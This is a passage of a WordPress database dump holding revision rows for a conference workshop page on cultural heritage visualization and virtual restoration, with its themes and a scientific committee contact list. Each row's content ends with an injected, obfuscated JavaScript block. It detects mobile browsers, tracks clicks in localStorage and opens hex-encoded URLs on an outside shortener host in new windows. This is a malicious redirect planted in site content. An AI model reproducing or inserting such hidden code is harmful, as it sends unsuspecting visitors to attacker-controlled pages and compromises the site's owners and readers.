|_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 23:01:26','2023-03-01 23:01:26','',3897,'https://gsw2023.com/?p=3908',0,'revision','',0),
(3909,1,'2023-03-01 23:02:19','2023-03-01 23:02:19','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"74\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<p><strong>Cultural heritage cognition and conceptual modeling</strong></p>\n<ul>\n<li>Cognition and ontology of cultural heritage</li>\n<li>Data integration and knowledge discovery</li>\n<li>GIS + HBIM integration of cultural heritage protection methods</li>\n<li>Visualization of cultural heritage ( Big Data, BIM/CIM, AR/VR/MR, AI)</li>\n<li>Conceptual modelling</li>\n<li>Intelligent interaction, visualization, and information update</li>\n</ul>\n<p><strong>Deterioration monitoring and assessment of culture heritage</strong></p>\n<ul>\n<li>Identification, extraction and analysis of heritage deteriorations</li>\n<li>Deep learning of heritage deteriorations: symptom classification and visualization</li>\n<li>Dynamic monitoring of heritage deteriorations based on hyperspectral and X-ray techniques</li>\n<li>Analysis of the causes of heritage deteriorations</li>\n<li>Immersive heritage deteriorations diagnosis</li>\n<li>Evaluation and preventive protection of heritage deteriorations</li>\n<li>Automated deteriorations mapping</li>\n</ul>\n<p><strong>Digital twins and virtual restoration of cultural heritage</strong></p>\n<ul>\n<li>Digital twins</li>\n<li>Innovation technology of spatio-temporal information of cultural heritage</li>\n<li>Virtual restoration, recovery, and reconstruction of cultural heritage</li>\n<li>Digital storytelling presentation and interpretation of cultural heritage (space, material, value)</li>\n<li>New Methods of Cultural Heritage Protection in the Post-epidemic Era</li>\n</ul>\n<p><strong>Heritage sustainability and other applications</strong></p>\n<ul>\n<li>Cultural heritage conservation and sustainable development based on multi-source information fusion</li>\n<li>Sustainable development of cultural heritage based on the expansion of existing UNSDGs indicators</li>\n<li>Digital cultural heritage applications and services</li>\n<li>Innovating immersive experience and the industry of culture and tourism</li>\n<li>Contextual education of cultural heritage</li>\n<li>Digital cultural heritage interactive conservation with Public Participation</li>\n<li>Archaeological prospecting using spatial technologies, including remote sensing, GIS, and GNSS.</li>\n<li>AI-powered identification of archaeological sites and/or landscapes</li>\n<li>Spatial analysis of the past human-enviroment interactions</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee</strong></h5>\n<ol>\n<li>Junshan Liu, McWhorter School of Building Science, Auburn University, USA.junshan.liu@auburn.edu</li>\n<li>Andreas Georgopoulos, Department of National Technical University of Athens, Laboratory of Photogrammetry, Greece, Email: <a href=\"mailto:drag@central.ntua.gr\">drag@central.ntua.gr</a></li>\n<li>AnRong Dang, Department of School of Architecture in Tsinghua University, China, Email: danrong@mail.tsinghua.edu.cn</li>\n<li>Bolognesi, Cecilia Maria, Department of Architecture, Built environment and Construction engineering (A.B.C.) , Politecnico di Milano, Milano, Italy, Email: <a href=\"mailto:cecilia.bolognesi@polimi.it\">bolognesi@polimi.it</a></li>\n<li>Chen Yang, Department of Tongji University, China, Email: <a href=\"mailto:chen.yang@tongji.edu.cn\">yang@tongji.edu.cn</a></li>\n<li>Fulong Chen, Department of The Aerospace Information Research Institute, China, Email: <a href=\"mailto:chenfl@aircas.ac.cn\">chenfl@aircas.ac.cn</a></li>\n<li>Grussenmeyer, Pierre, Department of Université de Strasbourg, INSA Strasbourg, CNRS, ICube Laboratory UMR 7357, Photogrammetry and Geomatics Group, 67000 Strasbourg, France, Email: <a href=\"mailto:pierre.grussenmeyer@insa-strasbourg.fr\">grussenmeyer@insa-strasbourg.fr</a></li>\n<li>Hallot, Pierre, Department of DIVA Art Archeology Heritage University of Liège, Belgian,Email: <a href=\"mailto:p.hallot@uliege.be\">hallot@uliege.be</a></li>\n<li>Hongtao Liu, Department of World Heritage Research Center in Southwest Jiaotong University, China, Email: <a href=\"mailto:bridge115@126.com\">bridge115@126.com</a></li>\n<li>Jie He, Department of School of Architecture in Tianjin University, China, Email: janushe@tju.edu.cn</li>\n<li>Long Ying, Department of School of Architecture in Tsinghua University,China, Email: <a href=\"mailto:ylong@mail.tsinghua.edu.cn\">ylong@mail.tsinghua.edu.cn</a></li>\n<li>Ona Vileikis, Department of University College London (UCL), England, Email: <a href=\"mailto:o.vileikis@ucl.ac.uk\">vileikis@ucl.ac.uk</a></li>\n<li>Prafulla Tarachand Janbade, Department of Chandigarh College of Architecture, India, Email: <a href=\"mailto:prafullatj@gmail.com\">prafullatj@gmail.com</a></li>\n<li>Tiwari, Reena,Department of Curtin University, Australia, Email: <a href=\"mailto:r.tiwari@curtin.edu.au\">r.tiwari@curtin.edu.au</a></li>\n<li>Victor Ferreira, Department of Lisbon School of Architecture, Lisbon, Email: <a href=\"mailto:victor.mota.ferreira@gmail.com\">victor.mota.ferreira@gmail.com</a></li>\n<li>Yuhua Wu, Department of Chinese Academy of Cultural Heritage, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">wuyuhua@cach.org.cn</a></li>\n<li>Shuqiang Lv, Department of Survey and Mapping, BUCEA, China, Email: <a href=\"mailto:wuyuhua@cach.org.cn\">lvshuqiang@b</a>ucea.edu.cn</li>\n</ol>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 23:02:19','2023-03-01 23:02:19','',3897,'https://gsw2023.com/?p=3909',0,'revision','',0),
(3910,1,'2023-03-01 23:04:06','2023-03-01 23:04:06','<!-- wp:paragraph -->\n<p>University of Florence</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 